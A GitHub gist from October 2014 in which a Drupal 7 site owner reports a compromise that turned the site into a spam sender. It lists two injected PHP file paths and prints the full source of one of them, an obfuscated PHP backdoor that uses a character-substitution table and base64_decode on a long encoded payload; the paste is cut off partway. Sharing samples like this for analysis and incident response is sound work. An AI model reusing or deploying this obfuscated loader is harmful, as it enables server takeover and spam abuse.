Created
October 31, 2014 09:25
-
-
Save Strae/38e36d0a54f60843dc66 to your computer and use it in GitHub Desktop.
Drupal 7 attack october 2014
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| My host just blocked one of my drupal7 websistes for being use for massive spam. | |
| Analyzing my access log, i found two script being called often and there are not a Drupal scripts: | |
| /sites/all/modules/i18n/i18n_block/stats7.php | |
| /modules/file/bs63d8.php | |
| /sites/all/modules/i18n/i18n_block/stats7.php: | |
| <?php | |
| $vNWZ3B7 = Array('1'=>'6', '0'=>'e', '3'=>'8', '2'=>'L', '5'=>'v', '4'=>'M', '7'=>'2', '6'=>'s', '9'=>'r', '8'=>'q', 'A'=>'l', 'C'=>'Y', 'B'=>'S', 'E'=>'K', 'D'=>'n', 'G'=>'T', 'F'=>'C', 'I'=>'y', 'H'=>'t', 'K'=>'G', 'J'=>'9', 'M'=>'k', 'L'=>'w', 'O'=>'H', 'N'=>'x', 'Q'=>'m', 'P'=>'E', 'S'=>'j', 'R'=>'O', 'U'=>'7', 'T'=>'4', 'W'=>'X', 'V'=>'D', 'Y'=>'d', 'X'=>'Z', 'Z'=>'I', 'a'=>'z', 'c'=>'R', 'b'=>'0', 'e'=>'B', 'd'=>'N', 'g'=>'h', 'f'=>'P', 'i'=>'o', 'h'=>'W', 'k'=>'c', 'j'=>'3', 'm'=>'A', 'l'=>'a', 'o'=>'f', 'n'=>'p', 'q'=>'F', 'p'=>'b', 's'=>'5', 'r'=>'g', 'u'=>'J', 't'=>'u', 'w'=>'U', 'v'=>'V', 'y'=>'Q', 'x'=>'1', 'z'=>'i'); | |
| function v5T7ETO($vQF6A3S, $vP8XOME){$v8YITRE = ''; for($i=0; $i < strlen($vQF6A3S); $i++){$v8YITRE .= isset($vP8XOME[$vQF6A3S[$i]]) ? $vP8XOME[$vQF6A3S[$i]] : $vQF6A3S[$i];} | |
| return base64_decode($v8YITRE);} | |
| $vC3WWUF = 'FQAQEKAak7vbEFcowPJGvq6zC7JMXBuYEBmQuzenkjdAYFrMWxefwxc'. | |
| 'pZQdxkjc5pvJgCjcnp7TzWBMruzCrlWdoX7J5XqJnkFrMWxdqwAXqw'. | |
| 'A6DwMvdGxcqWbqPcqZDWBMnFD6EFhv7ChLiCQqaXGCbW7cAC7JMXBrMWxefwxcpZQd5XKwzWBMnRLiuXWgnYFrnRLnJFrnnXzmil'. | |
| 'WdaXWyiuqJyGxdwhIub0WeAZAbnZFCQZFcowPJGvq6zYOALXBuYfGbz4BZnFD6EFWcskKwNWjdApQyiEG6EFhvTlWyi'. | |
| 'EG6EoynApOdAlhCrEKAak7vbEFcowPJGvq6zYOALXBuYEBmQuzmMWxefwxcpZDcskKwzWGbJZSZzEy'. | |
| 'nUFrnJFQv6k7vnXzmilWdaXWyiuqJyGxdwhIub0WeAZAbnEynUFrAAC7g5ZFcowPJGvq6zYOALXBuYRLiuXWgnYFrnRLnJFrnAkD'. | |
| 'u5kA3b4VyiEG6EFQXxpQdblhJtZKAaW7Y5p7colWmiuKALEynUFrMMX7J5XO4rfBeekDug0BrzdzTNR'. | |
| 'Vwt4S4s2zZ6ZFZT2SPaRFTN4GrtZzMUFrMEFhX5kQvgC7rrEFcDp7JMkIegkImMX7J5XFMEF'. | |
| 'W6EFyAnXzmikjcIkjcIEFcnkFLruKY5p7ynZFPJZPXeGqdqEyiuFW6EFyMukQvbYWutZqcBvwwUFrMuoyiuoyiuFrAI'. | |
| 'XWcxkQTrcMq4wbwUFDbEFQXxpQdblhJtZOcskKwNWjdApQyiEynUFrAnXzrglWdaXWyiuqJyGxdwhIuAphqnpO4z'. | |
| 'WBMEFyMuGxZrZhAak7vbEFcowPJGvq6zYKgAphvaZAbnFrMuFwJBZFqnkjdAYFrMWxefwxcpZQxAkjdgX7vaZAbn'. | |
| 'FrMuFwJBZFqnkjdAYFrMWxefwxcpZQXIp7xaZAbnFrMuFwJBZFqnkjdAYFrMWxefwxcpZQxglhNAkD4zWBMEF'. | |
| 'BMEFW6EFyAA0KAbEFMUFrAJFriulhCiX7vbW7xgX7ASWjqxpjcAkxJ'. | |
| 'DkK4iEBMEFW6EFyAQpjuAChdiEFcowPJGvFegkImMl7vsZVb+ZFcLpjdbEyiuFW6EFyMuuqJyGxdwhIc9XWAYZVbrkjcIlWeS'. | |
| 'k7Ngk7gAkIrMkKJaYFMUFrMuoyiuoyiEFBcAphqnpO4rfBemYhsaXWunChNn0Qw'. | |
| 'iCQqaXGCbW7cAC7JMXBrMWxefwxcpZQvHChA6kIuYEBMUFrMMYKgAphvaZVbryOvtk7vIlhq6lWnAEKugk7w7dq'. | |
| 'JMXhd5XKwiuqJyGxdwhIublKvHXW4zWBMnRLiuuKxAkjdgX7vaZVbryOvtk7vIlhq'. | |
| '6lWnAEKugk7w7dqJMXhd5XKwiuqJyGxdwhIuHXWdaChYAkIuYEBMUFrMMXDu5pW4'. | |
| 'rfBemYhsaXWunChNn0QwiCQqaXGCbW7cAC7JMXBrMWxefwxcpZQXIp7xaZAbnEG6EFBcHChA6XWuaZVbryOvtk'. | |
| '7vIlhq6lWnAEKugk7w7dqJMXhd5XKwiuqJyGxdwhIuHChA6XWuaZAbn'. | |
| 'EG6EFBcgpKAgk7vaZVbryOvtk7vIlhq6lWnAEKugk7w7dqJMXhd5XKwiuqJyGxd'. | |
| 'whIugpKAgk7vaZAbnEG6EFBcLCWdaXW4rfBemYhsaXWunChNn0QwiCQqaXGCbW7'. | |
| 'cAC7JMXBrMWxefwxcpZDegkjdAkIuYEBMUFriulhCilWdaXWyiuqJGcvuhcvZnEyiu0LiuFB'. | |
| 'cowbvBvMvBhIYyBqeowbv4czYYZVbrZz3zRImEFyMMWxdqwAXqwA6DwMvdGxcqWbqPc'. | |
| 'qZDWBmJZFZN4Skt4FTL2SPzRLiuFhAQEFqApWeb0BrMWxdqwAXqwA6DBqcwwqJCWb'. | |
| 'XfwAYewMcqcqJKGxZDWBMnFrMu0LiuFyMMWxdqwAXqwA6DBqcwwqJCWbXfwAYewMcqcqJKGxZDWBmJZ'. | |
| 'FZN4Skt4FTL2SPzRLiuFWbEFWbEFrAnXzgnkjdAYFrMWbXuGPvGEBMEFW6EFyAQpjuAChdiEFcocMA4cv4rCW4ruKHA0BmJ'. | |
| 'fzmMXQA6XBMEFyAUFrMuFBcQlhNApQqHXBmJZKq6YKvIW7xgCju5kIrMChNnCWdAkx6Ml7vsWBMUFrMuFBcQ'. | |
| 'lhNApQqHXBmJZKsxpvJHChdIpj4iuKXnpKvtChxAEG6EFyMuuKXnpKvtChxAZVbrYKvTYqJHChdIpj4iuKXnpKvtChxAEG6EFy'. | |
| 'MuuKXnpKvtChxAZVbr0KsxpvJHChdIpj4iuKXnpKvtChxAEG6EFyMuuqJKBwNqwx6Ml7vsWv6zpQqHXBuYZVbruKXnpK'. | |
| 'vtChxARLiuFWbEFWbEFrAnXzgApWeb0BrMXhxglhNaEBMEFW6EFyAA0KAbEFMUFrAJFriuXQJI'. | |
| 'XhqSlFmiuKvHChA6kIegkImMXDcAlhLrfGTruKvHChA6Eyiu0LiuFBcblKvHXBmJZFcblKvHXWdpCWuICWAokQqtXFrMYKgA'. | |
| 'phvaEvbUFrMuuOciXhxAZVbrChNbXWuophqSkQJaEFcblKvHXv6zYKgAphwzWBMUFrM'. | |
| 'uuOciXhxAZVbrpDvHW7xgCju5kIrMYKgAphwnRLiuFBcblKvHXBmJZOcA0Ocophq'. | |
| 'SkQJaEFcblKvHXBMUFrMuuOciXhxAZVbr0KsxpvJHChdIpj4iuOciXhxAEG6EFrMuuKxAk'. | |
| 'jdgX7wrfBmMphvak7qDXWdpCWuICWAokQqtXFrMphvak7qDXW4nWG6EFyMMphvak7qDXBmJZKq6YKvIW7xgCju5k'. | |
| 'IrMphvak7qDXv6zphvak7qDXBuYEG6EFyMMphvak7qDXBmJZKsxpvJHChdIpj4iuK'. | |
| 'xAkjdgX7wnRLiuFBcHXWdaChYAZVbrYKvTYqJHChdIpj4iuKxAkjdgX7wnRLiuFBcHXWdaChYAZVbr0Ksxp'. | |
| 'vJHChdIpj4iuKxAkjdgX7wnRLiuFB35uKxAkjdgX7wrfBeLCWdaW7xgCju5kIrMphvak7qDXBLruOegkjdAkI'. | |
| 'MUFrMuuKxAkjdgX7wrfBeQYKvnpqJHChdIpj4iuKxAkjdgX7w6ZFcQYKvnpFMUFriuFBcQkQJHZVbruKXIp7xa'. | |
| 'h7qIkQqsWjugpQyiuKXIp7xaEvbUFrMuuKXIp7brfBegpOcAkAJHChdIpj4iuKXIp7xpZQXIp7bzWBMUFrMuuKXIp7brfBetY'. | |
| 'hxophqSkQJaEFcQkQJHEG6EFyMMXDu5pBmJZOcA0OcophqSkQJaEFcQkQJHEG6EFyMMXDu5pBmJZ'. | |
| 'OgtYhxophqSkQJaEFcQkQJHEG6EFyMEFyAnXzmikjcIkjcIEFcQkQJH2FmzhbdvwxcfGv'. | |
| 'bzEBmJfBeKywNGcBMEFyAUFrMuFBcQkQJHZVbrXDu5pvJipjdbEFcQkQJHEG6EFyAJFrMuXhNaXyiuFW6EFyMuuKXI'. | |
| 'p7brfBeaYOuokQvLpKqSXBrzhbdvwxcfGvbz2FmzZzLruKXIp7bnRLiuFWbEFrMuuKxglhNAkzmJZFcHChA'. | |
| '6XWuah7qIkQqsWjugpQyiuKxglhNAkD4nWG6EFrMuk7vtXqJHChA6EFcQkQJH2Fm'. | |
| 'MXhxglhL6ZFcblKvHXBLruKxAkjdgX7w6ZFcHChA6XWZnRLiuoynJFrnQYhsSYKA5pzeaXhsMW7xglhLiuKXIp7b'. | |
| '6ZFcbpILruOdxCQi6ZFcbXWgb2FmMphqnpKvIEynUFzmrZFmMlKvgXFmJZFZzRLiEZF'. | |
| 'mrZFcxpzmJZOdbkDc5YWeLXWZiYhsnkhAMEOcnphwiEBMnRLiEZFmrZFciXhqMZFTJZFuKkQJHRzmMXDu5pvNtZS6EZFm'. | |
| 'rZFciXhqMZFTJZFuC2wxglhNAkSiruKxglhNAkANtZS6EZFmrZFciXhqMZFTJZFuBXWe'. | |
| '60BxwpairuKXIp7xkpzZUFrirZFmruKgAChyr2SbrZMxnphwHvQ'. | |
| 'vIk7A5pSir4BTLWKTzRLirZFmruKgAChyr2SbrZMd5pDcApDyHvOALXGirpWv6YKALCWub27'. | |
| 'q6YKvIpQqblWXARIZUFzmrZFmMlKvgXFmtfBmzCQJxpQcgkDMJWFZH2BbH2BbH2BbHZzTMYhTtZALzWKskpzZUFzmrZFmE'. | |
| 'ZFmrZFcLpKqnpzmJZOdbkQALWjcgXj4iuOcA0OynRLirZFmruOngX'. | |
| 'ImJZFZH2BbH2BbH2BbH2Bbz2zcxpzTzWKsVp7sbXhsb2vcskKw1ZOcA0Oy5kKNglhTUZKdiCWuaXWyJ'. | |
| 'WFuuwb3HRVrxRBbNWFZUZKX5kQxgYVxQpKJjXhckpzZUFzmrZFmM0QqDZFTJZFuVp7sbXhsb2vc'. | |
| 'IChsaXQvI2wvtC7JMlhsDRzmjCQAbWKskpzZtuOe6ChAt2zukpANtZS6EZFmrZmirZFmruO'. | |
| 'ngXImtfBmz2BbH2BbH2BbH2BbHZzTMYhTtZANty7JtYKvtYFxw0WeA'. | |
| 'RzebXWgb27gbphLUZKdiCWuaXWyJWFuuwb3HRVrxRBbNWFZUWKTzRLirZFmruOngXImtfBmzy7JtYKvtYFx'. | |
| 'wkQqtk7XAkzxqpQd5XKAtXaird7unYqNtWKTMYKvTYqNtWKTzRLirZFmruOngXImtfBmz2BbH2BbH2BbH'. | |
| '2BbHZzTMYhTtZzbHZS6EZFmrZmirZFmrlhCiC7JxpDyiuqJKBwNqwIMrfzmLEyirZFmr0LirZFmrZFmrZKX5kQvgC7riuqJKBwN'. | |
| 'qwIegkImMXQA6XBMEZFmrZFmrZFeUFzmrZFmrZFmrZFmrZKAQEKXnpKvoXWgnkjcaEFcQlhNAhIub'. | |
| 'pWeopQqHXBuYEBMEZFmrZFmrZFmrZFmr0LirZFmrZFmrZFmrZFmrZFmruKCrfBeQpjeApzrMXQA6Xv6zYKxL'. | |
| 'W7sgphwzWBLrZDuzZzMUFzmrZFmrZFmrZFmrZFmrZFmM0QqDZFTJZFZH2BbH2BbH2BbH2Bbz2zcxpzTzWKTzRLirZFmrZ'. | |
| 'FmrZFmrZFmrZFmruOngXImtfBmzy7JtYKvtYFxw0WeARzegkOe6lhdgYKA5p'. | |
| 'zJ5CjcAYFxaYOuAChbUZS6EZFmrZFmrZFmrZFmrZFmrZFc1Chkr2SbrZQsgphwJWFZz2zcQlhNAhIutCh'. | |
| 'xAZAbtZALzWKTzRLirZFmrZFmrZFmrZFmrZFmruOngXImtfBmzy7JtYKvtYFxwkQqtk7XAkzxqpQd5XKAtXanzCW'. | |
| 'dAdSckpzZUFzmrZFmrZFmrZFmrZFmrZFmM0QqDZFTJZFuVp7sbXhsb2wcnkje5k7AblhJtRQqbYKqSlKxApDyU'. | |
| 'ZS6EZFmrZFmrZFmrZFmrZFmrZFc1Chkr2SbrZQXnpKvtChxAfvLzZzTMXQA6Xv6zpQqHXBuY2zukZANtWKT'. | |
| 'zRLirZFmrZFmrZFmrZFmrZFmruOngXImtfBeSlOvtlxJakKNnYFgzCWdAdScoXhs'. | |
| 'Sp7cAEKXIXhqMEFcQ2FeQlhNAk7A1XBrMXQA6Xv6zYKxLW7sgphwzWBMnEBMtZANt'. | |
| 'ZS6EZFmrZFmrZFmrZFmrZFmrZKXSpKJaXBrMXzMUFzmrZFmrZFmrZ'. | |
| 'FmrZObEZFmrZFmrZFeJFzmrZFeJFrirZFmrlhCiyKxglhLiuOc52F'. | |
| 'mMkjvzlzLruOngXILruKgAChynEyirZFmr0LirZFmrZFmrZKAQEFqApWeb0BrMWxefwx'. | |
| 'cpujXAkQu5k7wDWBMnFzmrZFmrZFmrZFmrZKvSlK3rZAdqGMcqcFZUFzmrZFeJFzm'. | |
| 'rZFeApOdAFzmrZFeUFzmrZFmrZFmrlhCiZhvHkOcsEFcowPJGvq6DYQvICQJaXBYYEBMEZFmrZFmrZFmrZFmrXh'. | |
| 'dipImzcMquGFZUFzmrZFeJFDbEFQXxpQdblhJtZKq6YKvIW7xgCju5kIrMC7JtYKvtYF'. | |
| 'ME0LirZFmrkOuAXxJHCWcSlqJgpKLiuIdUEFT8EWbSvhMD2FmMC7JtYKv'. | |
| 'tYFLruKxgYKdiXW4nRLiEZFmrZKX5kzrMlBmJZVmUZFcnZVLrC7JxpDyiuKxgYKdiXWdp4vbnRImMlB69EyirZFmr'. | |
| '0LiEZFmrZFmrZFmMpD4rfBeA0Oe6p7cAEFu3ZzLruKxgYKdiXWdp4vxpuKAYEG6EZFmrZF'. | |
| 'mrZFmMCaZrfBeSpjvtYFrMpD4nRLirZFmrZFmrZFcIChsMZVbrkQqtXFrL2'. | |
| 'FmiuK4IZFbr4BMnRLirZFmrZFmrZFcSp7sbXhsbZVbrkjcIWjuAkKNgC7wiZD'. | |
| '6z2zcHCWcSlKvahaqYhIcnWBTzoBZ6ZFctkx6MkQqtXqb6ZFcSp7sbXhsbEG6EZFmrZObEZFmrZOu'. | |
| 'AYOvIpzmMC7JtYKvtYV6EoyiEXDvtCjcnp7TrYKvTYqJHChdIpj4iuKd5pDcApDynFD6EZFmrZOeIXhYophqbC7goChN6EFkS'. | |
| 'WqHwcvgwWFbihx61XKADlWy1Wvb9EvLHEqHpRQcnX7AbRAxYEIAkWB4D2FmMC7JtYKvtYFLruKxgYKdiXW4nRLiEZFmrZ'. | |
| 'KX5kzrMlBmJZVmUZFcnZVLrC7JxpDyiuKxgYKdiXWdp4qbnRImMlB69EyirZFmr0LirZFmrZFmrZFcHlhTrfBmMphqbC7'. | |
| 'gAkx6NWv6MlvbUFzmrZFmrZFmruKxg0FmJZFcHCWcSlKvahauYhIcnW'. | |
| 'G6EZFmrZFmrZFmMkQqtXFmJZOugpQyiuKxnpzLruKxg0FMUFzmrZ'. | |
| 'FmrZFmruOY5kQyrfBeDXhsAkQqbXvJjpjuMEFcIChsMEG6EFzmrZFmr'. | |
| 'ZFmruKd5pDcApDyrfBeLkQvDWjuAkKNgC7wiZz3z2DeIXhYokWv5YKwiuKxgYKdiXW'. | |
| 'dp4qxpuKAYEBTz2IZ6ZFcjpjuM2FmMC7JtYKvtYFLr4BMUFzmrZFeJFrirZF'. | |
| 'mrkOuAXxJHCWcSlqJgpKLiuIdkhxcqhqck2BgphanMlhYnYVnYWB6nWqbSuILruKd5pDcApDy6ZFcHCWcSlK'. | |
| 'vaEG6EFzmrZFeQpjZiuKMrfBmLRImMlBm3ZKd5YhsbEFcHCWcSlKvahaeYE'. | |
| 'G6ruKM9EIMEZFmrZO6EZFmrZFmrZFmMC7JxpDyrfBmMphqbC7gAkx6NWv6MlvbUFrirZFmrZFmrZFcjpjuMZFmJZKYApQvICWcAW'. | |
| 'jY5kQyiuKd5YhsbEG6EFzmrZFmrZFmruKd5pDcApDyrfBeLkQvDWjuAkKNgC7wiZz3z2DeIXhYokWv5YKwiuKxg'. | |
| 'YKdiXWdp4qxpuKAYEBTz2IZ6ZFcjpjuM2FmMC7JtYKvtYFLr4BMUFzmrZFeJFriEZFmrZOuAYOvIpzmMC7JtYKvtYV6E'. | |
| 'oyiEXDvtCjcnp7Tr0KsxpvJHChdIpj4iuKd5pDcApDynFD6EZFmrZOeIXhYophqbC7goChN6EFkSWqHRvwxk2BgphanMlhYnY'. | |
| 'VnYWB6nWqbSuILruKd5pDcApDy6ZFcHCWcSlKvaEG6EFzmrZFeQpjZiuKMrfBmLRI'. | |
| 'mMlBm3ZKd5YhsbEFcHCWcSlKvahaeYEG6ruKM9EIMEZFmrZO6EZFmrZFmrZFmMpDvHZVbru'. | |
| 'KxgYKdiXWdp4vxpuKAYRLirZFmrZFmrZFcHlhTrfBeLpjki4Gm6'. | |
| 'ZFctYhbr2BmNEG6EZFmrZFmrZFmMphqTZVbrkKJjEVPL2FmMpDvHEBmHZVPUFrirZFmrZFmrZFcIChsMZVbrkQqtXFrMphAt2F'. | |
| 'mMphqTEG6EZFmrZFmrZFmMC7JtYKvtYFmJZOdbkAJIXWe6ChdAEFcHCWcSlKvahaeYhIcnWBLruOugpQy6ZFcSp7sbXhsbEG6EZ'. | |
| 'FmrZObEZFmrZOuAYOvIpzmMC7JtYKvtYV6EoyiEXDvtCjcnp7TrpD'. | |
| 'vHW7xgCju5kIrMC7JtYKvtYFME0LirZFmrkOuAXxJHCWcSlqJgpKL'. | |
| 'iuIdkhxueGMck2BgphanMlhYnYVnYWB6nWFbihx61XKADlWy1Wvb9EvNYZIk6ZFcSp7sbX'. | |
| 'hsb2FmMphqbC7gAkIMUFrirZFmrXQJIEFcnZVbr4V6ruKMrfFeSpjvtYFrMphqbC7gAkx6'. | |
| 'LWBMUZFcnEI6nFzmrZFeUFzmrZFmrZFmruKxnpzmJZFcHCWcSlKvah'. | |
| 'aqYhIcnWG6EZFmrZFmrZFmMphqTZVbruKxgYKdiXWdp4AxpuKAYR'. | |
| 'LirZFmrZFmrZFcIChsMZVbrkQqtXFrMphAt2FmMphqTEG6EZFmrZFmrZFmMC7JtYKvtYFmJZOdbkAJIXWe6ChdAEFcHCWcSlKv'. | |
| 'ahaeYhIcnWBLruOugpQy6ZFcSp7sbXhsbEG6EZFmrZObEZFmrZOuAYOvIpzmMC7JtYKvtYV6EoyiEXDvtCjcnp7TrX7vtX'. | |
| 'WugYKvoY7JIXFrMpKvtXjciEynUFzmrZFmMC7ggkD4rfBmDChuSXKvQX7gnlQH6phs5kOqIkjcxYD'. | |
| 'AT0zkUFzmrZFmMpDvHy7ggkD4rfBeaYOu6XhTiuKdiCWuaEG6EZFmrZFcaYOunpQkrfBmDua6EZFm'. | |
| 'rZKX5kzrMlBmJZVmUZFcnZVLruKNApQYblV6ruKM9EIMEZFmrZO6EZFm'. | |
| 'rZFmrZFmMkjcIlhsDZFTJZOdxCDdbkzrMC7ggkD46ZOugpQyi4BLruKsxpwdiCWuaEBmHZVP6ZVPnRLirZFmroyirZFmrk'. | |
| 'QvbYWutZFcaYOunpQkUFDbEFQXxpQdblhJtZOegkjdophqSkQJaEFcSp7sbXhsb2FmMkKqak7vaEynUFzmrZFmMkKqakI'. | |
| 'mJZKqIkQqsWje5kFrMkKqak7vaEG6EZFmrZmirZFmrkQvbYWutZOdbkAJIXW'. | |
| 'e6ChdAEFupwPqGwxbz2FmMkKqakILruKd5pDcApDynRLnJFrnQYhsSYKA5pzeQYKvnpqJHChdIp'. | |
| 'j4iuKd5pDcApDy6ZFcQYKvnpFME0ImrZFmEZFmrZOuAYOvIpzeaYOuokQvLpKqSXBrzhbXwcwA4WBZ6ZFcQYKvn'. | |
| 'pFLruKd5pDcApDynRLnJFrnQYhsSYKA5pzenkxJnkFrMkjcIEBeUFzm'. | |
| 'rkQvbYWutZOeIXhYophqbC7riZzJ0Eq6N2GAYoq6N2GAYhamHRvx34v6L2GAYhamHRvx34A6L2GcYhamHRvx3'. | |
| '4Svp4FbxWBMiWFTihamHRvx3haPHRvxp4FbsWWLNhamHRvxp4FbsWWLIhamHdqxp4FbsWWLIdv6L2GvYEBAU4jbM2IZ6uOdbkzM'. | |
| 'UFDbEFQXxpQdblhJtZKXIp7xolKJaYFrMC7JtYKvtYFME0LiEZFm'. | |
| 'rZFcipjdbZVbrkOuAXxJIXWe6ChdAEFk5WzgjYjY3XDcLEvLt27MD2FkD2PmMWxdqwAXqwA6D'. | |
| 'BqcwwqJZGxdwuxbnRLiEZFmrZKAQZFgnkxJnkFrMlKJaYFMnFz'. | |
| 'mrZFeUFzmrZFmrZFmrkQvbYWutZFcSp7sbXhsbRLirZFmroyirZFmrFzmrZFmMYKJ9XhsaZVbrXWgLpKJMXB'. | |
| 'rzyFZ6ZFcSp7sbXhsbEG6EFzmrZFmMC7JtYKvtYFmJZFcbp7HApDdp4qbr2zmz'. | |
| 'yFZr2zmMlKJaYFmtZFZ+ZS6EFzmrZFeIXWcxkQTruKd5pDcApD'. | |
| 'yUFDbEFQXxpQdblhJtZKvIkQJIWayLdFrnFD6EFhgAChcAkzrzBqcwwF3N2SPrdVmbZPs5YFeKpjvtXFZnRLiEFBcx'. | |
| 'kQMrfBeLkQvDWjuAkKNgC7wiuI3iWV3n2ziM2Ik6ZFkD2FmMWxdqwAXqwA6D'. | |
| 'wMvcvwvGvqJvwMMDWBmnRLiEFBcSp7sbXhsbZVbrCjvaYKJHW7gbYOeokQvNYhvaYVPiZQgbYOm12I3z2zcowbvBvMvBhIYZvqcy'. | |
| 'WbgfwxyDWBTz2bqKwhnVGMgtlVgBYOcKBGdhGWuFXKcXYaXIpQY20SY2cwPzEG6EFBcSp7sbXhsbZVbrkjcIWjuAkKNg'. | |
| 'C7wiZFZ5ywXclMdRBKsiRqubYPXu4xXdkMuMXqAjdDutXbH1dbHqyBZ6ZFcxkQM6ZFcSp7sbXhsbZFMUFriuXWgnYFrruKd'. | |
| '5pDcApDyrEG6EoyiEFQXxpQdblhJtZKdxkjc5pvJiYOcLWjuAkWvAkjyNEFcLCWugpW4nFD6EZFmrZKAQEFmgZKAa'. | |
| 'W7qIkQqsEFcLCWugpW4nZFMEZFmrZO6EZFmrZFmrZFmMkKqIChxaZV'. | |
| 'brCWuICWMiFzmrZFmrZFmrZFmrZFYxkQLDZVb+ZFcLCWugpW46F'. | |
| 'zmrZFmrZFmrZFmrZFYHXWcip7yDZVb+ZFYOcvyDFzmrZFmrZFmrEG6EZF'. | |
| 'mrZObEZFmrZmirZFmrlhCiZFcLCWugpWdpujvIpFYYfGbDuImnZOuAYOvIpz'. | |
| 'eKywNGcG6EZFmrZmirZFmrlhCiZFPrlWdaXWyiuOegkQqHkx6Dphv'. | |
| 'blKJMuxbnZFMruOegkQqHkx6DphvblKJMuxbrfBmilWdaXWyiuO'. | |
| 'egkQqHkx6DXKqbCBYYEBCQlWdoCWuICWMiuOegkQqHkx6DXKqbCBYYEBMrfImDwPJGvFkrRzmDcbvwua6EZFmrZFcLCWugpWdpu7'. | |
| 'xAYKg5XFYYZVbrkjcIYKJxkOeAkzrMkKqIChxahIYHXWcip7yDWBMUFzmrZFenXzrrZ'. | |
| 'BenpAJgkDug0BrMkKqIChxahIYHXWcip7yDWBLrCWuICWMiubYqvFk6ZFYyGxdwuIMnZF'. | |
| 'MrkQvbYWutZPXeGqdqRImEZFmrZmirZFmr2Iirbu/crdFTb22y5HFbb2Sy5FVcrYKebC5ytJF1bC4rb'. | |
| '2Zrb2/crdFLb22ytdFUbCay5YK2b2Mrb22ytdFbZFi5FzmrZFmMYWu6ZVbrkKqIk7voYWu6EF'. | |
| 'cLCWugpWdpujvIpFYYEG6EZFmrZKAQEFmgZKAak7vbEFcxkQNpujdSlKvH'. | |
| 'XBYYEBmnZFcxkQNpujdSlKvHXBYYZVbru7gbYOmDRLirZFmrlhCiZFPrlWdaXWyiuOvIpq6DkKqblFYYEBmnZF'. | |
| 'cxkQNpujegYKrDWBmJZFk5ua6EZFmrZKAQEFmgZKAak7vbEFcxkQNp'. | |
| 'u7g5kjyDWBMruzCrlWdaXWyiuOvIpq6DkKqblFYYEBmnFzmrZFeUFzmrZFmrZFmrl'. | |
| 'hCiZOdbkDe5kIrMYWu6hIYLCWciuxb6ZFk5uIMrEyirZFmrZFmrZO6EZFmrZFmrZFmrZFmruOvIpq6DlKJaYFYYZVb'. | |
| 'rkjvzkjcIEFcxkQNpujegYKrDWBLr4FLrkjcIkKJaEFcxkQNpujegYKrDWB'. | |
| 'LruI3DEBMUFzmrZFmrZFmrZFmrZFcxkQNpujegYKrDWBmJZOdxCDdbkzrMYWu6hIYLCWciuxb6ZOdbkDe5kIrMYWu6hIY'. | |
| 'LCWciuxb6ZFk5uIMnRLirZFmrZFmrZObEZFmrZFmrZFeApOdAFzmrZFmrZFmr0LirZFmrZFmrZFmrZFmMYWu6hIYipj'. | |
| 'dbuxbrfBmMYWu6hIYLCWciuxbUFzmrZFmrZFmrZFmrZFcxkQNpujegYKrDWBmJZFk5ua6uF'. | |
| 'zmrZFmrZFmroyirZFmroyirZFmruOvIpq6DkKqblFYYZVbrkOuAXxJIXWe6ChdAEFZ5hxNk2xb92IZ6ZF'. | |
| 'Z5ZzLruOvIpq6DkKqblFYYEG6EZFmrZKAQEFenkjdAYFrMYWu6hIYNYhvI0BYYEBm'. | |
| 'nZFcxkQNpujegYKrDWBmtfBmzfj6MYWu6hIYNYhvI0BYYoBZUFzmrZFmEZFmrZFcLpjubZVbrlWdaX'. | |
| 'WyiuOegkQqHkx6DkKJIYFYYEBm/ZFcLCWugpWdpuje5kDyDWyirZFmrZFm'. | |
| 'rZFmrZFm1ZFrrlWdaXWyiuOvIpq6DkKJIYFYYEBm/ZFcxkQNpuje5kDyDWBm1ZFrMYWu6hIYaC7'. | |
| 'gAphwDWGbJu7gbYOeaua3bdV41RVmnZFMUFzmrZFmEZFmrZFcblhxApjv'. | |
| 'bZVbrlWdaXWyiuOegkQqHkx6DYKAHXhJxYFYYEBm/ZFcLCWugpWdpujcnphv5YWyDWBm1ZV4LRLirZFmrlhCiZFPrl'. | |
| 'WdaXWyiuOegkQqHkx6DkQvbYWutuxbnZFMruOegkQqHkx6DkQvbYWutuxbrfBmDC7J'. | |
| 'tYKvtYFkUFzmrZFmEZFmrZFcaC7gAphwrfBmMYWu6hIYaC7gAphwDWGbJu7gbYOeauIm/ZFYak7L12I3DRzkDR'. | |
| 'LirZFmruKXLZVbryKXap7d9pjeApzrMk7diXhxA2zcxkQNpu7g5kjy'. | |
| 'DWBLruOe5kDy6ZFcAkDutpILruKvIkDdbkzLruOcnphv5YWynRLirZF'. | |
| 'mrlhCiZFcQkFmnFzmrZFeUFzmrZFmrZFmr2IirGhJ1lhN6CBm82LirZFmrZFmrZKAQEFmgZKAak'. | |
| '7vbEFcLCWugpWdpuxvaXWZHyhYApDyDWBMrEBmMkKqIChxahIYvk7vI2wqDXhsbuxbrfBmzGhJ1'. | |
| 'lhN6CB3x2SmrEKAylKJtXG6rvG6ryxevZKAylKJtXBefwImaWamrpKA9XBedCh4rGx4rhV6rXhTHYW4nZ'. | |
| 'PqLkKNAv7vzB7Ab2awIRFTNRFmiBbgwGwL6ZKNnl7wrc7vSl73nZqXAkDdnp7T5dFT'. | |
| 'LZPx5CQA6XB3jyG4b4BeGChXgkQM5dGZT2SP7ZS6EZFmrZFmrZFmEZFmrZFmrZFmMkQvNYhvaYFmJZF'. | |
| 'uUuOegkQqHkx6DphvblKJMuxxJZO6MYWu6hIYLCWciuxxJZPgwvqm54BTLW'. | |
| 'OukpzZUFzmrZFmrZFmruOuAkWvAkjyr2SbrZMg5kjy1ZO6MYWu6hIYipjdbuxxJWOukpzZUFzmrZFmrZFm'. | |
| 'ruOuAkWvAkjyr2SbrZAvaXWZHyhYApDy1ZO6MkKqIChxahIYvk7vI2wqDXhsbux'. | |
| 'xJZzTzWOukpzZUFzmrZFmrZFmrlhCiZKAak7vbEFcLCWugpWdpujuAXQvIXWZDWBMrEBmMk'. | |
| 'QvNYhvaYFmtfBmzwQvQXWuAkSir0IcLCWugpWdpujuAXQvIXWZDWWxkkANtZS6EZFmrZFmrZFenXz'. | |
| 'rrlWdaXWyiuOegkQqHkx6DC7J5l7AAuxbnZFMEZFmrZFmrZFeUFzmrZFmrZFmrZFmrZFcSp7J9lhwrfBmzZS6EZFm'. | |
| 'rZFmrZFmrZFmrlhCiZKAaW7qIkQqsEFcLCWugpWdpu7d5p7HnXBYYEBmnZOHQpjuAChd'. | |
